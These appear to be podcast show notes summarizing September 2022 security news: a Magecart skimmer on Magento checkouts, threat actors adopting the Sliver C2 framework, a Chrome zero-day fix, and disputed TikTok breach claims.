Episode 27: September 05 2022
Links
https://cyware.com/news/magecarts-new-javascript-skimmer-targets-magento-websites-e2b125fc
https://securityaffairs.co/wordpress/135177/cyber-crime/javascript-skimmer-magecart.html
https://www.bleepingcomputer.com/news/security/hackers-adopt-sliver-toolkit-as-a-cobalt-strike-alternative/
https://www.bleepingcomputer.com/news/security/google-chrome-emergency-update-fixes-new-zero-day-used-in-attacks/?&web_view=true
https://chromereleases.googleblog.com/2022/09/stable-channel-update-for-desktop.html
https://thehackernews.com/2022/09/tiktok-denies-data-breach-reportedly.html
https://www.bleepingcomputer.com/news/security/tiktok-denies-hack-following-leak-of-user-data-source-code/
https://twitter.com/TikTokComms/status/1566760896571080704
https://twitter.com/MayhemDayOne/status/1566748988770066435
Times
00:36
06:59
14:53
23:13
Magecart’s New JavaScript Skimmer Targets Magento Websites
- Security researchers from Cyble analyzed a recently disclosed Magecart skimmer.
- A post on Twitter
- discussing a new JavaScript skimmer
- developed by a Magecart threat group.
- new skimmer targets Magento e-commerce websites
- steal payment details.
- How it works
- the attacker exploits a vulnerability in the Magento e-commerce site
- injects malicious code into the payment forms and checkout pages.
- When a user visits the compromised website
- skimmer loads a payment overlay
- that asks for payment details.
- The malicious JS code is loaded with standard skimmer anti-detection features.
- The skimmer code is obfuscated
- it scans if any dev tool is installed in the browser.
- If it detects any, the code terminates to avoid analysis.
- the JavaScript code collects and sends data to a URL controlled by the attacker.
- skimmer loads a payment overlay
- discussing a new JavaScript skimmer
Hackers adopt Sliver toolkit as a Cobalt Strike alternative
- Cobalt Strike has grown in popularity as an attack tool for various threat actors, including ransomware operations, to drop on compromised networks “beacons” that allow moving laterally to high-value systems.
- defenders have learned to detect and stop attacks relying on this toolkit, hackers are trying other options that can evade Endpoint Detection and Response (EDR) and antivirus solutions.
- Facing stronger defenses against Cobalt Strike, threat actors have found alternatives. Palo Alto Networks observed them switch to Brute Ratel, an adversarial attack simulation tool designed to elude security products.
- A report from Microsoft notes that hackers, from state-sponsored groups to cybercrime gangs, are more and more using in attacks the Go-based Sliver security testing tool developed by researchers at BishopFox cybersecurity company.
- dumping the Cobalt Strike penetration testing suite
- similar frameworks that are less known
- Brute Ratel number 1
- Sliver is becoming an attractive alternative.
- open-source, cross-platform kit
- Not a huge concern
- malicious activity using Sliver can be detected using hunting queries that are available
- Microsoft provides a set of tactics, techniques, and procedures (TTPs) that defenders can use to identify Sliver and other emerging C2 frameworks.
- Sliver C2 network supports multiple protocols (DNS, HTTP/TLS, MTLS, TCP) and accepts implants/operator connections
- can host files to mimic a legitimate web server
- can set up listeners to identify anomalies on the network
- Microsoft also shared information on how to detect Sliver payloads
- Shellcode
- Executables
- shared libraries/DLLs, and services
- Enterprises protected by Defender
- Microsoft has created for the commands a set of hunting queries
- that can run in the Microsoft 365 Defender portal.
- Microsoft has created for the commands a set of hunting queries
- similar frameworks that are less known
Google Chrome emergency update fixes new zero-day used in attacks
- Google has released Chrome 105.0.5195.102 for Windows, Mac, and Linux users to address a single high-severity security flaw, the sixth Chrome zero-day exploited in attacks patched this year.
- “Google is aware of reports that an exploit for CVE-2022-3075 exists in the wild,” the company said in a security advisory published on Friday.
- This new version is rolling out in the Stable Desktop channel, with Google saying that it will reach the entire user base within a matter of days or weeks.
- It was available immediately when BleepingComputer checked for new updates by going into the Chrome menu > Help > About Google Chrome.
- The web browser will also auto-check for new updates and automatically install them after the next launch.
- No exploitation details available
- The zero-day bug fixed today (CVE-2022-3075) is a high severity vulnerability caused by insufficient data validation in Mojo, a collection of runtime libraries that facilitates message passing across arbitrary inter- and intra-process boundaries.
- Google says that this security issue was found by a security researcher that chose to report it anonymously.
- Even though the browser vendor says the zero-day was exploited in the wild, it is yet to share technical details or info regarding these incidents.
- “Access to bug details and links may be kept restricted until a majority of users are updated with a fix,” Google added.
- “We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven’t yet fixed.”
- By delaying the release of more information on these attacks, Google is likely aiming to provide Chrome users with enough time to update and prevent exploitation attempts until more threat actors create their own exploits to deploy in attacks.
- Sixth Chrome zero-day fixed in 2022
- With this release, Google has issued security updates to address the sixth Chrome zero-day patch since the start of the year.
- The previous five zero-day vulnerabilities found and patched in 2022 are:
- CVE-2022-2856 – August 17th
- CVE-2022-2294 – July 4th
- CVE-2022-1364 – April 14th
- CVE-2022-1096 – March 25th
- CVE-2022-0609 – February 14th
- As the Google Threat Analysis Group (TAG) revealed in February, CVE-2022-0609 was exploited by North Korean-backed state hackers weeks before the February patch. Furthermore, the earliest signs of exploitation were found in early January.
- The bug was abused in campaigns pushing malware via phishing emails using fake job lures and compromised websites hosting hidden iframes serving exploit kits.
- Given that the zero-day bug patched today is also known to have been exploited by attackers in the wild, it is strongly recommended to upgrade the Google Chrome web browser as soon as possible.
Was TikTok Breached?
- BlueHornet (aka AgainstTheWest)
- tweeted over the weekend
- “Who would have thought that TikTok would decide to store all their internal backend source code on one Alibaba Cloud instance using a trashy password?”
- Account has since been suspended
- Tiktok
- ByteDance-owned company
- “”Our security team investigated these claims and found no evidence of a security breach.”
- alleged reports of a hack
- surfaced on the Breach Forums message board
- September 3
- BlueHornet
- server holds 2.05 billion records in a humongous 790GB database
- threat intelligence researcher at Security Discovery
- Bob Diachenko,
- Confirmed that the breach is “real”
- data is likely to have originated from “Hangzhou Julun Network Technology Co., Ltd rather than TikTok.”
- Not sure where the data originated from
- Or if 3rd parties have access
- Troy Hunt
- Have Ibeenpwned fame
- “This is so far pretty inconclusive; some data matches production info, albeit publicly accessible info,”
- “Some data is junk, but it could be non-production or test data. It’s a bit of a mixed bag so far.”
- “Who would have thought that TikTok would decide to store all their internal backend source code on one Alibaba Cloud instance using a trashy password?”
- tweeted over the weekend